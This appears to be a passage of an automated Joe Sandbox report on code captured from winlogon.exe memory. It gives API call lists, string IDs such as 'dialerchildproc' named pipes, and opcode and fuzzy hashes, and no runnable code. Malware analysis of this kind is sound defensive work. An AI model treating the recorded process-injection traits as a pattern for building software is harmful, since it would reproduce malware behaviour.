                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction Fuzzy Hash: 9F81A4617822C386FB50AB27D44939922A1FB99780F96482FBD4547797DB38C9C78F30

                        Control-flow Graph

                        APIs
                        • GetLastError.KERNEL32 ref: 000002E99175CE37
                        • FlsGetValue.KERNEL32(?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CE4C
                        • FlsSetValue.KERNEL32(?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CE6D
                        • FlsSetValue.KERNEL32(?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CE9A
                        • FlsSetValue.KERNEL32(?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CEAB
                        • FlsSetValue.KERNEL32(?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CEBC
                        • SetLastError.KERNEL32 ref: 000002E99175CED7
                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CF0D
                        • FlsSetValue.KERNEL32(?,?,00000001,000002E99175ECCC,?,?,?,?,000002E99175BF9F,?,?,?,?,?,000002E991757AB0), ref: 000002E99175CF2C
                          • Part of subcall function 000002E99175D6CC: HeapAlloc.KERNEL32 ref: 000002E99175D721
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CF54
                          • Part of subcall function 000002E99175D744: HeapFree.KERNEL32 ref: 000002E99175D75A
                          • Part of subcall function 000002E99175D744: GetLastError.KERNEL32 ref: 000002E99175D764
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CF65
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CF76
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Value$ErrorLast$Heap$AllocFree
                        • String ID:
                        • API String ID: 570795689-0
                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction ID: d19b245fd988bfb2817d68be97438e53c8424c1f9c669e008c2cccf14dbdb104
                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction Fuzzy Hash: 734174203C12C742FA69A737D55D3692289BB447B4F160B2FA936466E7DF3884C19F30
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                        • API String ID: 2171963597-1373409510
                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction ID: 2ec8cc7cd3fe4d2c1af7483aaecc8ed615e3356d440049c4b66141594478c441
                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction Fuzzy Hash: F4214F32654781C3FB108B26F44875973A1F789BE4F91021AEA5943BA9DF3CC589CF51
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                        • Instruction ID: 97f73203f8982477833e52015e33f754f7e99079407345b81d307e64eaf0c1f0
                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                        • Instruction Fuzzy Hash: C1E18F72644BC28AEB20DF66D4883AD77A0F745798F12112BEE8957B97CB34D5C1CB20
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction ID: 920fc7fd0e7b6407fb21e7a3f32b8b7f41c9ae5ea962bf932353d45c49382d83
                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction Fuzzy Hash: BAE1C1326427D286EB60CF26D4883AD77A0F749788F15091AEE8947B9BCF34C1D2CB10
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: AddressFreeLibraryProc
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 3013587201-537541572
                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                        • Instruction ID: a37450bc1c151caee95b075b815692e99cd55a6f4dc24f28fbba06317fb40626
                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                        • Instruction Fuzzy Hash: 2741D622391B8292FB56CB17E8087562795B745BE0F47492F9D0E87786EF3CC4C58B60
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                        • String ID: d
                        • API String ID: 3743429067-2564639436
                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                        • Instruction ID: c14a8d93c31946622ec18366339607f616fe7fb0c74b8ef5f7eef75a911a86bd
                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                        • Instruction Fuzzy Hash: A0419133214BC5C6E760CF22E44879EB7A1F388B89F44812AEA8A47759DF38C485CB50
                        APIs
                        • FlsGetValue.KERNEL32(?,?,?,000002E99175C7DE,?,?,?,?,?,?,?,?,000002E99175CF9D,?,?,00000001), ref: 000002E99175D087
                        • FlsSetValue.KERNEL32(?,?,?,000002E99175C7DE,?,?,?,?,?,?,?,?,000002E99175CF9D,?,?,00000001), ref: 000002E99175D0A6
                        • FlsSetValue.KERNEL32(?,?,?,000002E99175C7DE,?,?,?,?,?,?,?,?,000002E99175CF9D,?,?,00000001), ref: 000002E99175D0CE
                        • FlsSetValue.KERNEL32(?,?,?,000002E99175C7DE,?,?,?,?,?,?,?,?,000002E99175CF9D,?,?,00000001), ref: 000002E99175D0DF
                        • FlsSetValue.KERNEL32(?,?,?,000002E99175C7DE,?,?,?,?,?,?,?,?,000002E99175CF9D,?,?,00000001), ref: 000002E99175D0F0
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Value
                        • String ID: 1%$Y%
                        • API String ID: 3702945584-1395475152
                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                        • Instruction ID: a96b1890e74b2ecd0ea9938466009dfee319b739ed4c7e033c1762021a338c56
                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                        • Instruction Fuzzy Hash: 481181207902C242FA69A737D55D3696185BB443F4F16472F983A466EBDF38C4C28E30
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID:
                        • API String ID: 190073905-0
                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction ID: cd15232f422848d1d810b8ca1d68bf3e5a859180c35751ee036576ae4bb720cf
                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction Fuzzy Hash: 4981C3216806C3A6FB50AB6BE44D3A922D4F745780FD7441FAA0987797EB38C9C58F31
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Library$Load$AddressErrorFreeLastProc
                        • String ID: api-ms-
                        • API String ID: 2559590344-2084034818
                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                        • Instruction ID: 207c3dd52896e77b572485204b7de8f36d24d6c4bffc08408b80e03efac7f2a8
                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                        • Instruction Fuzzy Hash: 363196223526C2E1EE15DB43E4487656394B74CBA0F9B052F9D1D47792EF39C4C59B20
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                        • String ID: CONOUT$
                        • API String ID: 3230265001-3130406586
                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                        • Instruction ID: 5be6fbadabfa398e5c5c06da23e062949b7ae7d32590008ef573cc00081c362b
                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                        • Instruction Fuzzy Hash: 6B11B231350BC182E7508B13E84831972A4F388FE4F45022AEA5EC7796CF38C4948BA1
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID: dialer
                        • API String ID: 756756679-3528709123
                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                        • Instruction ID: 186717381455e3181557c70e4b3e181aab8ff8ec6f9d2597f1690986fa17b43e
                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                        • Instruction Fuzzy Hash: 6931C522741B92C3EB54DF17E54872967A1FB44BC0F4A402AAE4847B97EF34C4E18B60
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Value$ErrorLast
                        • String ID:
                        • API String ID: 2506987500-0
                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                        • Instruction ID: 88b896e7da52e95fd00ccff7768d99056a53124772a0c671c365fb61c8ceb8e1
                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                        • Instruction Fuzzy Hash: 92115E203912C242FA65A733D55D3292185BB447F4F16072EA836467D7DF7884C28F30
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                        • String ID:
                        • API String ID: 517849248-0
                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                        • Instruction ID: 715ac3fdfa83c77bb0e460137307d450772adbe10476670a3786bf80235cc521
                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                        • Instruction Fuzzy Hash: 17012D21340A8282EB54DB53E45C75963A5F788BC5FCA403AEE5A83756DF3CC989CB50
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                        • String ID:
                        • API String ID: 449555515-0
                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                        • Instruction ID: c6f769b54c004a354a452a2a46bf369459501ef8588b7fa1b2b20c3275c221d8
                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                        • Instruction Fuzzy Hash: 69016D6475178282FB249B23E80C71523B0FB49B82F96082EDD4947766EF3CC1888F20
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 2395640692-629598281
                        • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                        • Instruction ID: e9dc35c7a832d2cc683b6cd1fa1022522abd5526910dd1348563b3731bf2def8
                        • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                        • Instruction Fuzzy Hash: 1851C33274169286EB54CF26E84CB693796F344BC8F52852EDA064778ADB35DCC1CF20
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: FinalHandleNamePathlstrlen
                        • String ID: \\?\
                        • API String ID: 2719912262-4282027825
                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction ID: 412175bfc77c0f7889df0d48bc3560869d283f7d8297d7432b8b3449444d2e85
                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction Fuzzy Hash: 09F04F223446C292EB608B22F99875967A5F748BC9FC5402ADA498695ADF3CC6CDCF10
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CombinePath
                        • String ID: \\.\pipe\
                        • API String ID: 3422762182-91387939
                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                        • Instruction ID: c358c5bd6c370e4e94212374ef1c3ac1b27339a5d47b43ba3a3d7addd493d33b
                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                        • Instruction Fuzzy Hash: 44F08260354BC682EA008B13F91C119A261BB48FC0F85403AEE4A87B2ADF3CC4C58B21
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                        • Instruction ID: 25295f8d8ab3043a6409b7c076f3c8c014371e5dc60beb8abb4c75a9d3b53d50
                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                        • Instruction Fuzzy Hash: 27F0966135178691EB108B26E45C3696331FB84BE1F95031FDA6A861F6DF3CC4C5CB61
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                        • Instruction ID: 899714654cfee5a0a87d9affd5898931fb4ed2655e43b4f37e6fe9002d5fc822
                        • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                        • Instruction Fuzzy Hash: 4761E736559BC6C7E760DB16E44831AB7E4F388784F52011AEA8E47BAADB7CC590CF10
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: _set_statfp
                        • String ID:
                        • API String ID: 1156100317-0
                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction ID: 8833cec01b3b712e7df5753de1625ed22ad95ee90a5c308719c3cffe9809f191
                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction Fuzzy Hash: 1B11E322BD0AC3A5F66F156AD45D36911407B783F8F1B062FA977876D7CA24C8C08A23
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: _set_statfp
                        • String ID:
                        • API String ID: 1156100317-0
                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction ID: 6fce0c9865f46e94ad79d61300e9938692d5aaaf41cf770363b3baa4ae580780
                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction Fuzzy Hash: 7B11A323BD0AD315FAB4153BF44D36911807B58374F6B862FA9760A2D7CA28CBC34A30
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: _invalid_parameter_noinfo
                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                        • API String ID: 3215553584-4202648911
                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                        • Instruction ID: 27c43efc3ebcb98436fdd8ae9cc1473d170633621c7fc37e2b7ea1367af98575
                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                        • Instruction Fuzzy Hash: 1E61B3625866C642F7658B6BE54C32E26E1F746740FA34C1FCA0A177A7DA34C9C38B30
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CallEncodePointerTranslator
                        • String ID: MOC$RCC
                        • API String ID: 3544855599-2084237596
                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction ID: c265801518a2bdb581e286e63e256228ab63efdfaaa28672a2b32cc6fb03c2c2
                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction Fuzzy Hash: CE619F33600B858AEB20DF66D4843AD77B0F344B8CF05462AEF4917B9ADB38C595CB50
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction ID: 446d1a1c64522073db0cd5d5834e42522880cf304d97d4b8b40f77ecf9adbd4b
                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction Fuzzy Hash: DE515E721803C28BEB648B27E58835977A0F354B95F1A512FDA9947BDACB38D4D1CF10
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction ID: f3086e5e95a6481f7f96e1afe717cc730f762cabb17a0b2f305e154ee185ea95
                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction Fuzzy Hash: 1A518D321453C2CAEB648B16D44835877A0F395B94F1A491BDA8987BD7CB78D4D2CF10
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction ID: 310a40da76a7e8494b2a523292ada4b4d5fdfe551cf15d0e710db459a0c84222
                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction Fuzzy Hash: 5C51D63274228287EB14CF17E408B1837D5F354B98F62892EDA564374EE736C9C28F24
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction ID: 4d9fb923a024668931dd26515bb1f8222d8a35d90d0c19900a676a0e9de2e7fc
                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction Fuzzy Hash: 6D31A23124278197E714DF13E84871977E4F744B98F16891EEE9A0778ADB39CA82CF24
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: FileWrite$ConsoleErrorLastOutput
                        • String ID:
                        • API String ID: 2718003287-0
                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                        • Instruction ID: d17a5b66f24651ba47f914fd9a9177c7c4c5eae1cb0dd37e5dc1cb50b43e6a1d
                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                        • Instruction Fuzzy Hash: 0DD10132B14AC18AE751CFBAD4483DC3BB1F3547D8F12821ACE5997B9ADA34C486CB51
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Heap$Process$Free
                        • String ID:
                        • API String ID: 3168794593-0
                        • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                        • Instruction ID: 958daf10776be36ad14651f8af9b4503ca9b67d81655b7db465c2faf28d38bcd
                        • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                        • Instruction Fuzzy Hash: F4015E32641BD1C6D708DF67E90814A77A0F788FC5F85442AEA4A9371ADF38C091CB91
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: ConsoleErrorLastMode
                        • String ID:
                        • API String ID: 953036326-0
                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction ID: dea98d673b1eb583a7a563bef56f37ee4aaf8a9f40eb06f1ad15a2b81e6a3132
                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction Fuzzy Hash: BD91C3727546D285F7A09F66D4483AD3BA0F744BC8F56410FDE0AA7A96DB34C4C2CB22
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                        • String ID:
                        • API String ID: 2933794660-0
                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
